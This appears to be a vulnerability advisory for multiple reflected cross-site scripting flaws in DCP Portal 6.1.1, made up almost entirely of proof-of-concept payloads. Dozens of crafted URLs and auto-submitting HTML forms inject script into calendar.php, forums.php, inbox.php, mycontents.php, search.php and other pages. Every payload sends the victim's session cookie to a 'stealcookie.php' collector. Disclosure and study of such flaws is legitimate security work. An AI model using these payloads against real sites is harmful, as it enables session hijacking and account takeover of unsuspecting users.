DCP Portal Multiple Cross-Site Scripting Vulnerabilities

These issues are reflected cross-site scripting flaws that can be exploited with an ordinary web browser: the victim must follow a crafted link (the GET variants below) or load an attacker-controlled page that auto-submits a form (the POST variants below). Every payload shown redirects the browser to a collector script with `document.cookie` appended, so session cookies without the HttpOnly flag can be captured.

The following proof-of-concept URIs and auto-submitting HTML forms demonstrate the issues. In the URI variants the `+` that concatenates the collector URL with `document.cookie` is URL-encoded as `%2b` so it survives query-string decoding (a literal `+` would be decoded to a space and break the expression); the form variants carry a literal `+` in the POST body. `www.example.com` stands in for both the vulnerable host and the attacker's collector (`stealcookie.php`) — substitute a host you control when reproducing:
http://www.example.com/dcp-portal611/index.php?page=documents&dl=xyz&its_url=xyz.html"><script type="text/javascript">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/index.php?page=send_write&url=xyz.html"><script type="text/javascript">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/calendar.php?subject_color="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/calendar.php?images="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/calendar.php?day=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>

<!-- PoC: auto-submitted POST to calendar.php. The XSS payload travels in the
     "day" query parameter of the action URL (hence %2b for "+"); only "year"
     is sent in the POST body. The leading "> suggests "day" is reflected
     inside a quoted attribute value - inferred from the payload, not verified here. -->
<form action='http://www.example.com/dcp-portal611/calendar.php?show=full_month&month=02&day="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>' method="post">
<input type="text" name="year" value='2006' />
<input type="submit">
</form>
<!-- Submits on load; forms[0] assumes this is the first form on the hosting page. -->
<script type="text/javascript">
document.forms[0].submit();
</script>

http://www.example.com/dcp-portal611/calendar.php?year=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>

<!-- PoC: auto-submitted POST to forums.php?action=board. The payload is the
     POSTed "bid" field (literal "+" is fine in a form body). The prefix "></a>
     closes a quoted attribute and an <a> element, which suggests "bid" is
     reflected into a link - inferred from the payload, not verified here. -->
<form action='http://www.example.com/dcp-portal611/forums.php?action=board&bid=1' method="post">
<input type="text" name="bid" value='"></a><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<!-- Submits on load; forms[0] assumes this is the first form on the hosting page. -->
<script type="text/javascript">
document.forms[0].submit();
</script>

http://www.example.com/dcp-portal611/forums.php?action=board&bid="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/forums.php?action=addtopic&bid=1&replying_msg=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>

<form action='http://www.example.com/dcp-portal611/forums.php?action=addtopic&bid=1' method="post">
<input type="text" name="subject" value='"><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action='http://www.example.com/dcp-portal611/forums.php?action=addtopic&bid=1' method="post">
<input type="text" name="body" value='"></textarea><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

http://www.example.com/dcp-portal611/forums.php?action=addtopic&bid=1&mid="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>

<!-- PoC: auto-submitted POST to forums.php?action=savemsg with the payload in the
     POSTed "bid" field; the leading "> suggests reflection inside a quoted
     attribute - inferred, not verified here. -->
<form action='http://www.example.com/dcp-portal611/forums.php?action=savemsg' method="post">
<input type="text" name="bid" value='"><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<!-- Submits on load; forms[0] assumes this is the first form on the hosting page. -->
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action='http://www.example.com/dcp-portal611/inbox.php?action=send' method="post">
<input type="text" name="subject" value='"><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="text" name="message" value='' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action='http://www.example.com/dcp-portal611/inbox.php?action=send' method="post">
<input type="text" name="message" value='"></textarea><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="text" name="subject" value='' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<!-- PoC: POST to inbox.php?action=delete with the payload in the "subject" query
     parameter of the action URL (hence %2b). The only POSTed field is the submit
     button itself, name="submit" value="Reply" - presumably this selects a
     reply path that echoes "subject" into a quoted attribute; inferred, not
     verified here. -->
<form action='http://www.example.com/dcp-portal611/inbox.php?action=delete&subject="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>' method="post">
<input type="submit" name="submit" value='Reply'>
</form>
<!-- Submits on load; forms[0] assumes this is the first form on the hosting page. -->
<script type="text/javascript">
document.forms[0].submit();
</script>

<!-- PoC: as the previous form, but the payload rides in the "message" query
     parameter and opens with "></textarea>, suggesting it is echoed into a
     <textarea> on the reply view - inferred, not verified here. -->
<form action='http://www.example.com/dcp-portal611/inbox.php?action=delete&message="></textarea><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>' method="post">
<input type="submit" name="submit" value='Reply'>
</form>
<!-- Submits on load; forms[0] assumes this is the first form on the hosting page. -->
<script type="text/javascript">
document.forms[0].submit();
</script>

http://www.example.com/dcp-portal611/lostpassword.php?subject_color="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/lostpassword.php?email="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=content&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=content&content_inicial=</textarea><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=content&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=addnews&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=addnews&content_inicial=</textarea><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=addnews&mode=write&dcp_editor_contingut_html=xyz&c_name=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>&c_image_name=
http://www.example.com/dcp-portal611/mycontents.php?action=addanns&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=updatecontent&cid="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=updatecontent&cid=1&mode=write&c_image_name=xyz&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>

<!-- PoC: POST to search.php with the payload in the "field" query parameter of
     the action URL (bare <script>, i.e. reflected directly into page text);
     the POSTed fields only make the search handler run. NOTE(review): table,
     return and id_col are accepted from the client here - whether search.php
     validates them is outside what this PoC shows and deserves a separate look. -->
<form action='http://www.example.com/dcp-portal611/search.php?field=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>' method="post">
<input type="text" name="q" value="xyz"/>
<input type="text" name="query" value="true"/>
<input type="text" name="return" value="tid, title, body"/>
<input type="text" name="table" value="dcp5_forum_messages"/>
<input type="text" name="id_col" value="tid"/>
<input type="submit">
</form>
<!-- Submits on load; forms[0] assumes this is the first form on the hosting page. -->
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action='http://www.example.com/dcp-portal611/search.php' method="post">
<input type="text" name="q" value='<script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script> method="post">'/>
<input type="text" name="query" value="true"/>
<input type="text" name="return" value="tid, title, body"/>
<input type="text" name="table" value="dcp5_forum_messages"/>
<input type="text" name="id_col" value="tid"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>


 
